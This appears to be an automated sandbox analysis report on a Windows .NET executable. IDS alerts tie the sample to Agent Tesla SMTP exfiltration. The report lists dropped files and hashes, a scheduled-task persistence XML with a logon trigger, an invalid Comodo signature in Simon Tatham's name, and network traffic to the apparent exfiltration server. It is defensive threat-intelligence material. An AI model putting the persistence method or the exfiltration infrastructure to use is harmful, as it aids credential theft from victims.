                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2232
                                                                                                Entropy (8bit):5.379460230152629
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:fLHyIFKL3IZ2KRH9OugQs
                                                                                                MD5:D951BCD234F0E41C2E1282F2D92650E3
                                                                                                SHA1:5116D690A37C280737C348ECC2EFC02DE8C517C9
                                                                                                SHA-256:3E840928EC1CEB87110E9BD98F08738621389E2575E32954A6B01B8F4DCE441C
                                                                                                SHA-512:F37E142A1CB2C6D00C7E8F13DE81D7110A59FD1CC2F764BCAB46C97D2C99871C497422E545B2D997999DA70D755CFCED7B1D49AFBF907AF0660FD60C3E64382E
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):1578
                                                                                                Entropy (8bit):5.114932825977826
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAJxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTp/v
                                                                                                MD5:54652743F8AF3C8850DFC5D1B17A25F3
                                                                                                SHA1:B35BEA435DB0AA7D3C5400AECD4E230215CC34A8
                                                                                                SHA-256:0548AF62515374ACF317E54F58541670243342C85C771BE8D291BB94990850C6
                                                                                                SHA-512:47B210FAD4A5C279BF9D7A82019BBB7B92FB41ED8BE579683813F90F400DF2389F9AF9B70C54191680F103C4D57809F34FB14A752D9D34701287645E0AD1F573
                                                                                                Malicious:true
                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                Process:C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):1578
                                                                                                Entropy (8bit):5.114932825977826
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAJxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTp/v
                                                                                                MD5:54652743F8AF3C8850DFC5D1B17A25F3
                                                                                                SHA1:B35BEA435DB0AA7D3C5400AECD4E230215CC34A8
                                                                                                SHA-256:0548AF62515374ACF317E54F58541670243342C85C771BE8D291BB94990850C6
                                                                                                SHA-512:47B210FAD4A5C279BF9D7A82019BBB7B92FB41ED8BE579683813F90F400DF2389F9AF9B70C54191680F103C4D57809F34FB14A752D9D34701287645E0AD1F573
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):791560
                                                                                                Entropy (8bit):7.903473670480701
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:rcZoYXRFbxfO0M+0GDyrT2n9TZyjfqhA1L2ncwZLhS6kdYU5G2g+NTMHF6wNrcwQ:gZoSRFNfO0MDeZ2CAscwEYUXmlP9/Xs
                                                                                                MD5:6E7DF9FAE35366F13F6D83E037321608
                                                                                                SHA1:1A3231720688F17AD0ED86C633FF02A9777B5753
                                                                                                SHA-256:232DDA5F15F635E041AFCE6E34F17BA284380475A14232E85856065BDD78F0BE
                                                                                                SHA-512:7D8450BB2687B4ECD267A84E2696CABE0EBB5872CC509F95C0000744DA9864043258CFCD20EF84D0E53BACBF025EEF58FE8192D66C69F66687519E3D61CFF230
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                • Antivirus: Virustotal, Detection: 42%, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>q.e..............0.............N.... ........@.. .......................@............@.....................................W........................6... ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H........<..........C...P....X..........................................z...Y...?....7.............f.q.....:..@...p!~..-e..O&|..w9...IA....9w.......'d.<..x!...'.9.Xy...H....P...f...Ss.s48r.V...H....9......H.I_f.f..0....v6.1.."......C.YC..^.&/...|Pd[pq\s...=...@...I8...Ct.+yo.>8....{.,.v*.....Eu..@._5.4.l.(.<....0..Xe... ........:l.@....9....A...l.5i...............j(....#n.E..c.a....[.i|.........4.M.8.]...\u..w..6....,.y[4...$/.}..n.?...7.f...#WP.H..
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.903473670480701
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                File name:SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                                                                                                File size:791'560 bytes
                                                                                                MD5:6e7df9fae35366f13f6d83e037321608
                                                                                                SHA1:1a3231720688f17ad0ed86c633ff02a9777b5753
                                                                                                SHA256:232dda5f15f635e041afce6e34f17ba284380475a14232e85856065bdd78f0be
                                                                                                SHA512:7d8450bb2687b4ecd267a84e2696cabe0ebb5872cc509f95c0000744da9864043258cfcd20ef84d0e53bacbf025eef58fe8192d66c69f66687519e3d61cff230
                                                                                                SSDEEP:12288:rcZoYXRFbxfO0M+0GDyrT2n9TZyjfqhA1L2ncwZLhS6kdYU5G2g+NTMHF6wNrcwQ:gZoSRFNfO0MDeZ2CAscwEYUXmlP9/Xs
                                                                                                TLSH:83F401993250B19FC817CEB38A981C34EA307967631BC717A05725ACDA5EADACF141F3
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>q.e..............0.............N.... ........@.. .......................@............@................................
                                                                                                Icon Hash:0f6371584c713b8e
                                                                                                Entrypoint:0x4be04e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x65DB713E [Sun Feb 25 16:56:30 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                Subject Chain
                                                                                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                Version:3
                                                                                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbdff40x57.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x1618.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xbde000x3608
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000xbc0540xbc200623c9640a9095f5029095437d0f6ae44False0.9258370535714285data7.918332877222406IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xc00000x16180x18007a3405e006545d84cdafc7411f213e1cFalse0.43115234375data4.193254440161085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xc20000xc0x200da92606bcc3bd156db10d28c43b66ae5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0xc01300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.4692776735459662
                                                                                                RT_GROUP_ICON0xc11d80x14data1.1
                                                                                                RT_VERSION0xc11ec0x23cdata0.47202797202797203
                                                                                                RT_MANIFEST0xc14280x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain
                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                02/25/24-21:27:00.324583TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49739587192.168.2.450.87.139.143
                                                                                                02/25/24-21:27:00.324583TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49739587192.168.2.450.87.139.143
                                                                                                02/25/24-21:27:00.324583TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49739587192.168.2.450.87.139.143
                                                                                                02/25/24-21:27:00.324583TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249739587192.168.2.450.87.139.143
                                                                                                02/25/24-21:27:00.324334TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49739587192.168.2.450.87.139.143
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 25, 2024 21:26:47.291099072 CET49678443192.168.2.4104.46.162.224
                                                                                                Feb 25, 2024 21:26:47.509902000 CET49675443192.168.2.4173.222.162.32
                                                                                                Feb 25, 2024 21:26:53.870152950 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:53.870260954 CET44349734104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:53.870331049 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:53.887931108 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:53.887969017 CET44349734104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:54.149629116 CET44349734104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:54.149701118 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:54.156229019 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:54.156253099 CET44349734104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:54.156578064 CET44349734104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:54.197307110 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:54.256071091 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:54.301906109 CET44349734104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:54.447940111 CET44349734104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:54.447992086 CET44349734104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:54.448245049 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:54.455437899 CET49734443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:55.342048883 CET49735587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:55.525393009 CET5874973550.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:55.525474072 CET49735587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:56.964253902 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:56.964293003 CET44349738104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:56.965058088 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:56.968760967 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:56.968779087 CET44349738104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:57.226022959 CET44349738104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:57.226236105 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:57.228868961 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:57.228888035 CET44349738104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:57.229254007 CET44349738104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:57.276835918 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:57.335527897 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:57.381899118 CET44349738104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:57.403125048 CET5874973550.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:57.447323084 CET49735587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:57.530061007 CET44349738104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:57.530137062 CET44349738104.26.13.205192.168.2.4
                                                                                                Feb 25, 2024 21:26:57.530184031 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:57.534046888 CET49738443192.168.2.4104.26.13.205
                                                                                                Feb 25, 2024 21:26:57.575779915 CET49735587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:58.075812101 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:58.260200024 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:58.260298967 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:59.084813118 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:59.085026026 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:59.267852068 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:59.269817114 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:59.452296019 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:59.453210115 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:59.676248074 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:59.732983112 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:59.733164072 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:26:59.915421963 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:59.915555954 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:26:59.915695906 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:27:00.139399052 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:27:00.140933037 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:27:00.141083002 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:27:00.323395014 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:27:00.323448896 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:27:00.324333906 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:27:00.324583054 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:27:00.324610949 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:27:00.324637890 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:27:00.506613970 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:27:00.507982016 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:27:00.556704044 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:27:35.072607994 CET4972680192.168.2.4172.64.149.23
                                                                                                Feb 25, 2024 21:27:35.072618961 CET4972580192.168.2.4172.64.149.23
